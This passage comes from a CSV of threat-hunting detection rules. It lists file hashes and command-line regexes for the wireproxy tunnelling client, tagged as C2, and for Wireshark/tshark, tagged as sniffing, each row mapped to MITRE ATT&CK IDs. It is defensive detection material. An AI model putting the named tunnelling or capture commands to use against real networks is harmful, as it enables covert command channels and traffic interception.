TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*98d3073aff25e6cdb287e366be5de18f461b7e820176a5211dfcf203e8ef6680*",".{0,1000}98d3073aff25e6cdb287e366be5de18f461b7e820176a5211dfcf203e8ef6680.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*a35294253d487a15fd813da9ec51e1f9c71e6ba81a5e19caf2401a87572627de*",".{0,1000}a35294253d487a15fd813da9ec51e1f9c71e6ba81a5e19caf2401a87572627de.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" 
"*a48e07ec7e49b7db108e6491d061d118b5c0b52dcf3bbc60390d4b2b9011f8dc*",".{0,1000}a48e07ec7e49b7db108e6491d061d118b5c0b52dcf3bbc60390d4b2b9011f8dc.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*a6990ac66bfbbfeaef787dff39ec08610cca7c77d33747b5a76583e7f7916f2c*",".{0,1000}a6990ac66bfbbfeaef787dff39ec08610cca7c77d33747b5a76583e7f7916f2c.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*a9c55684d85a79c12aea4a9c4c43be98addd32f88c21b240979f47b8c04cca02*",".{0,1000}a9c55684d85a79c12aea4a9c4c43be98addd32f88c21b240979f47b8c04cca02.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*a9fd574e1f0c58461722fc1abc15cd01efb472bcdc1f703de2b918f2fa7dec64*",".{0,1000}a9fd574e1f0c58461722fc1abc15cd01efb472bcdc1f703de2b918f2fa7dec64.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*aea7f25ff97c149ba56c8b4c956d4814269c6c66a5d2a215ef8333ab9499b2da*",".{0,1000}aea7f25ff97c149ba56c8b4c956d4814269c6c66a5d2a215ef8333ab9499b2da.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client 
that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*b03d96d8d00893f76bd9c55b7ce47750222728e30b19d23e1a39e0239ea6420d*",".{0,1000}b03d96d8d00893f76bd9c55b7ce47750222728e30b19d23e1a39e0239ea6420d.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*b39aacc5eb127dab66d1ccbbcbee9ee6cf659d27ebe9cec63c4940754acab7da*",".{0,1000}b39aacc5eb127dab66d1ccbbcbee9ee6cf659d27ebe9cec63c4940754acab7da.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*b673a20bc465d0312a145da0fa9382d990b4f28d2d492452be952a32c1740f50*",".{0,1000}b673a20bc465d0312a145da0fa9382d990b4f28d2d492452be952a32c1740f50.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*b6c43379ca375e18916fd220fb5bb4c76a0bb75c5e83532fa47d6f74aeee61d6*",".{0,1000}b6c43379ca375e18916fd220fb5bb4c76a0bb75c5e83532fa47d6f74aeee61d6.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*b93eda57716e1c55030ac507cbbb9c70b6cfe3d0d5b9041742b4a5e90538a90e*",".{0,1000}b93eda57716e1c55030ac507cbbb9c70b6cfe3d0d5b9041742b4a5e90538a90e.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*bafe621127910335db84dfc38a60088d1aaf6ab52cf2ecebab389457103137b0*",".{0,1000}bafe621127910335db84dfc38a60088d1aaf6ab52cf2ecebab389457103137b0.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*bbe8a83b968e62d2f07b427ca70f48454a33e44250ae43fbe917caf93bc0da26*",".{0,1000}bbe8a83b968e62d2f07b427ca70f48454a33e44250ae43fbe917caf93bc0da26.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*bc19099bd718989cf9f415548edc77044563a512dafeba5a2042626b3238df6d*",".{0,1000}bc19099bd718989cf9f415548edc77044563a512dafeba5a2042626b3238df6d.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" 
"*bcf09d38544f07d19337c6c7cbf1d12a29f418d0f85cae8c3af17f37b63d5836*",".{0,1000}bcf09d38544f07d19337c6c7cbf1d12a29f418d0f85cae8c3af17f37b63d5836.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*bef4bc1889b6d80b2551b3b3f70feb3df848edf2beb72935129f7e4fba42edc5*",".{0,1000}bef4bc1889b6d80b2551b3b3f70feb3df848edf2beb72935129f7e4fba42edc5.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*bf352b6fb09f15ce5bb29db4f131baa128eb579b157e7ab140682891bae6393b*",".{0,1000}bf352b6fb09f15ce5bb29db4f131baa128eb579b157e7ab140682891bae6393b.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*c46fd158ad7a0dbb616b1c0c5416bb77e43d5aef95869923d62097034d2a1cf7*",".{0,1000}c46fd158ad7a0dbb616b1c0c5416bb77e43d5aef95869923d62097034d2a1cf7.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*c66ea235f3bec5713b4b30abb7fa938c472f9f66b1f1fcaacdf8b0e7c36a735b*",".{0,1000}c66ea235f3bec5713b4b30abb7fa938c472f9f66b1f1fcaacdf8b0e7c36a735b.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client 
that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*c85dda1fd27eb34db30a297fe5ddfa279904579ce968d8fbe08d68a263c71a8a*",".{0,1000}c85dda1fd27eb34db30a297fe5ddfa279904579ce968d8fbe08d68a263c71a8a.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*cb5d63e74dee2d3908969d245f21722523a3a111f98a3ed13f6554cab98569e3*",".{0,1000}cb5d63e74dee2d3908969d245f21722523a3a111f98a3ed13f6554cab98569e3.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*cfad83c752fa011d705c5a6fa65f0ea4fb99f56209a8b67f9a32629a7f36ee6d*",".{0,1000}cfad83c752fa011d705c5a6fa65f0ea4fb99f56209a8b67f9a32629a7f36ee6d.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*d1409d4d6fc200f7f5569b844c0005eb1963a94a857ae4fb5caeb496783cca07*",".{0,1000}d1409d4d6fc200f7f5569b844c0005eb1963a94a857ae4fb5caeb496783cca07.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*d166f3899cc7eb349d9ce4c8adc8f60e3a2908ed29ddf4a2e52e070d78e290ec*",".{0,1000}d166f3899cc7eb349d9ce4c8adc8f60e3a2908ed29ddf4a2e52e070d78e290ec.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*d341e25ece7b66006ffeae3f76194bb12a9d120368f0616e1ab58186dcaff932*",".{0,1000}d341e25ece7b66006ffeae3f76194bb12a9d120368f0616e1ab58186dcaff932.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*d3ac20c9e1aa6062e8454e12f8dcae4bb66ed6bef18e304268196066760947aa*",".{0,1000}d3ac20c9e1aa6062e8454e12f8dcae4bb66ed6bef18e304268196066760947aa.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*d454762487d1118fa84e8931d4ae93bdf0c39fa1f42deb177825eb8d94e8f989*",".{0,1000}d454762487d1118fa84e8931d4ae93bdf0c39fa1f42deb177825eb8d94e8f989.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" 
"*d4a4b8c5f774ed28466d584b62cc61f44d2f89f139c7df2e63aefcfc203c2f3a*",".{0,1000}d4a4b8c5f774ed28466d584b62cc61f44d2f89f139c7df2e63aefcfc203c2f3a.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*d6e656ad3fba0ef5630a6607f3b02ee5920085a8fc724e7617d959300d809cab*",".{0,1000}d6e656ad3fba0ef5630a6607f3b02ee5920085a8fc724e7617d959300d809cab.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*d72dd4d052362db7dee1bb2ed177279d4b4f6199288b7a0f9f377accc67e8f01*",".{0,1000}d72dd4d052362db7dee1bb2ed177279d4b4f6199288b7a0f9f377accc67e8f01.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*d9499b5feb59b820c0b9610da94455e1ef96ea018e170261ffabedda39044cce*",".{0,1000}d9499b5feb59b820c0b9610da94455e1ef96ea018e170261ffabedda39044cce.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*dae86be018d5317f61477f260e8508149e769688aa642327fc6caba5786cc26d*",".{0,1000}dae86be018d5317f61477f260e8508149e769688aa642327fc6caba5786cc26d.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client 
that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*db5df4b216cfc30f8a23337a875331dfa29a90ec6d1330aa834bd5eb641c2c6a*",".{0,1000}db5df4b216cfc30f8a23337a875331dfa29a90ec6d1330aa834bd5eb641c2c6a.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*e2ad65bd782f8e3faa19426d408b84ca2d1cd0b4a3d12668febb8d94aca0457c*",".{0,1000}e2ad65bd782f8e3faa19426d408b84ca2d1cd0b4a3d12668febb8d94aca0457c.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*e90c0327bdf81bc4b5ebca4701cd2bfeb5f62a63c2e78e04756e3219ce01d990*",".{0,1000}e90c0327bdf81bc4b5ebca4701cd2bfeb5f62a63c2e78e04756e3219ce01d990.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*ea40a6037ecaaf48b26ef67834d9142e426b84bdb9d7bac5ed62528e0a27cc60*",".{0,1000}ea40a6037ecaaf48b26ef67834d9142e426b84bdb9d7bac5ed62528e0a27cc60.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*eca2eda42fa2d4f71de8055f79066fce3866d22c8f38060ee98978341fd2a078*",".{0,1000}eca2eda42fa2d4f71de8055f79066fce3866d22c8f38060ee98978341fd2a078.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*edb87b5669e9a133f18328402a89242a7844ad244929133803439e95201958d8*",".{0,1000}edb87b5669e9a133f18328402a89242a7844ad244929133803439e95201958d8.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*f00e2511ae291bed3ad7e08cfb4cb960ea10e14ef51ba15c928d5d3d14fdb09d*",".{0,1000}f00e2511ae291bed3ad7e08cfb4cb960ea10e14ef51ba15c928d5d3d14fdb09d.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*f18f551bbe47c5078c3e49718dea7287979b203fbd01149e9def64bbae723e4c*",".{0,1000}f18f551bbe47c5078c3e49718dea7287979b203fbd01149e9def64bbae723e4c.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" 
"*f5ebf3d481f604a7f5d301034f7868eb02bf07545dc2a3eccd755ca49356684f*",".{0,1000}f5ebf3d481f604a7f5d301034f7868eb02bf07545dc2a3eccd755ca49356684f.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*f650e73547f22ce8b7503d31f62d2f8426c5734e5b25074d08527e50f74b0bdb*",".{0,1000}f650e73547f22ce8b7503d31f62d2f8426c5734e5b25074d08527e50f74b0bdb.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*f71e8c4887a42cff058f46f270cc2c142ba2fdb4b714fd6c65e44a0ed09e2433*",".{0,1000}f71e8c4887a42cff058f46f270cc2c142ba2fdb4b714fd6c65e44a0ed09e2433.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*pufferffish/wireproxy*",".{0,1000}pufferffish\/wireproxy.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","1","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*wireproxy --*",".{0,1000}wireproxy\s\-\-.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*wireproxy -c *",".{0,1000}wireproxy\s\-c\s.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*wireproxy -n *",".{0,1000}wireproxy\s\-n\s.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*wireproxy -s*",".{0,1000}wireproxy\s\-s.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*bin/wireshark*",".{0,1000}bin\/wireshark.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*dl.wireshark.org*",".{0,1000}dl\.wireshark\.org.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*dumpcap -*",".{0,1000}dumpcap\s\-.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol 
analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*install tshark*",".{0,1000}install\stshark.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*libwireshark16*",".{0,1000}libwireshark16.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*libwireshark-data*",".{0,1000}libwireshark\-data.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*libwireshark-dev*",".{0,1000}libwireshark\-dev.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*libwiretap13*",".{0,1000}libwiretap13.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" 
"*--no-promiscuous-mode*",".{0,1000}\-\-no\-promiscuous\-mode.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*sharkd -a tcp:*",".{0,1000}sharkd\s\-a\stcp\:.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*tshark *-i *",".{0,1000}tshark\s.{0,1000}\-i\s.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*tshark -f *",".{0,1000}tshark\s\-f\s.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*tshark -Q*",".{0,1000}tshark\s\-Q.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*tshark -r *",".{0,1000}tshark\s\-r\s.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & 
Spoofing","https://www.wireshark.org/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*tshark*.deb*",".{0,1000}tshark.{0,1000}\.deb.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*Wireshark*",".{0,1000}Wireshark.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*wireshark*.deb*",".{0,1000}wireshark.{0,1000}\.deb.{0,1000}","greyware_tool_keyword","wireshark","Wireshark is a network 